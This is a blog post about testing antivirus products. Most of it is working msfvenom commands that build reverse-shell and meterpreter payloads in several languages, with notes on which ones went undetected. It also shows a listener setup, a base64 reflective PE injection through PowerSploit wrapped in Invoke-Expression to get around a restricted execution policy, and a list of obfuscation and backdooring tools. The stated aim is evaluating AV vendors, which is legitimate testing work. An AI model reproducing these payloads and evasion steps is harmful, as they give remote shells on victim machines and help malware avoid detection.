Testing AVs With Simple Vectors

Having had the need to run some tests against prospective AV vendors, I have performed some simple tests using Metasploit payloads and Mimikatz. In this post, I will go over the techniques used and how to employ them.

To kick off I generated a basic executable meterpreter with simple encoding and no encryption.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= LPORT=4444 -o meterpreter.exe -f exe --encoder x64/xor_dynamic --platform windows --arch x64 

The options used are:

  • -p the payload to use.
    LHOST & LPORT – these are the Metasploit options which are set in msf using “set OPTION value”. In this case, the attacking host and attacking port because all payloads used are reverse TCP payloads (the victim host connecting back to the attacking machine as opposed to the attacking machine connecting to the victim).
  • -o the output file.
  • -f the format to use. Use raw when generating script payloads (or the language name e.g. python) to get the native code. There are options to transform payloads but I will not be covering this.
  • -p the target platform. Generally not needed for scripting languages like Python.
  • –arch the target platform architecture. Generally not needed for scripting languages like Python.

Within Metasploit, I kicked off the listener. This will be common to all generated payloads so I will not be repeating it. Just note that the payload and port will need to change depending on what is generated with msfvenom.

use multi/handler
set payload windows/x64/meterpreter_reverse_tcp

As expected this was detected without issue, no surprise there.

I generated a few more payloads using various languages. A lot of these can be shimmed into the environment without requiring an install making them viable vectors.

Java – detected – Requires JVM or JSK. Execute with java – jar file.jar

msfvenom -f raw -p payload/java/meterpreter/reverse_tcp  LHOST= LPORT=4443 -o payload.jar

PHP – detected – requires PHP for windows. Execute with php -f payload.php

msfvenom -f raw -p php/meterpreter/reverse_tcp  LHOST= LPORT=4442 -o payload.php

Python – not detected by one vendor (detected by Windows Defender though) – requires Python for Windows. Execute with python3.exe payload.py

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST= LPORT=4441 -o payload.py

Ruby – not detected – TCP handler only so requires work to set up a meterpreter in a separate thread. Requires Ruby for Windows. Execute with ruby.exe payload.rb

msfvenom -f raw -p ruby/shell_reverse_tcp LHOST= LPORT=4441 -o payload.rb

NodeJS – not detected – TCP handler only so requires work to set up a meterpreter in a separate thread. Requires NodeJS for Windows. Execute with node.exe payload.js

msfvenom -f raw -p  nodejs/shell_reverse_tcp LHOST= LPORT=4440 -o payload.js

On to some slightly more complicated attacks. Here we encode a binary payload to base64. This is included in Kali and various other distros by default.

base64 binary.exe > file.base64

Now we inject this base64 binary into the PowerShellMafia/Powersploit script Invoke-ReflectivePEInjection.ps1. This repository appears to be no longer maintained but if you look through the pull requests you can find updated scripts which may work with new protections and changes put into Windows.

Since I want to execute this file in an environment with a restricted execution policy I’ve placed the payload at the bottom of the file invoking the payload without needing to import the module.

In vim, you can easily achieve this by inserting the code, type “:” to enter command mode and entering “r /path/base_64_file_name” which will insert the contents of the file at the current location. You may need to format it correctly.

Invoke-ReflectivePEInjection -PEBytes $([System.Convert]::FromBase64String("Insert_Base_64_Here")) -ForceASLR

Now we encode the actual script because why not?

base64 powershell.ps1 > powershell.base64

Copy the file to script_name.ps1 or edit the base64 file directly and wrap it in the following.

Invoke-Expression $([System.Text.Encoding]::Ascii.GetString([System.Convert]::FromBase64String("Insert_Base_64_Here")))
type code.base64 | powershell -noprofile - 

In the above example, I tried a few exe payloads including Mimikatz. Mimikatz was, of course, picked up when it starting interacting with LSASS.

There are a few more options for obfuscation including encryption, other encoding methods and other tools.

While I will not be covering the following in this post, here are some other tools for obfuscations, testing, and attacks:

  • veil – Veil evasion framework for masking binaries. On Kali install with “apt install veil”.
  • shellter – a shellcode PE injector. On Kali install with “apt install shellter”.
  • cymothoa – Another backdooring tool. On kali install with “apt install cymothoa”.
  • backdoor-factor – another shellcode injector. On Kali install with “apt install backdoor-factory”
  • shellnoob – A shellcode writing tool. On Kali install with “apt install shellnoob”
  • nishang – a collection of PowerShell scripts that can be used on a Windows machine. On Kali install with “apt install nishang”.
  • Invoke-Obfuscation.ps1 – Obfuscates Powershell scripts (requires a Windows machine). Clone it from GitHub with “git clone https://github.com/danielbohannon/Invoke-Obfuscation.git”
  • magic-unicorn – PowerShell obfuscator. On Kali install with “apt install unicorn-magic”. The script is not added to $PATH so you will need to call it from “/usr/share/unicorn-magic/unicorn.py”. If you ever forget where a package’s files are on a deb based system run “dpkg -L package-name”.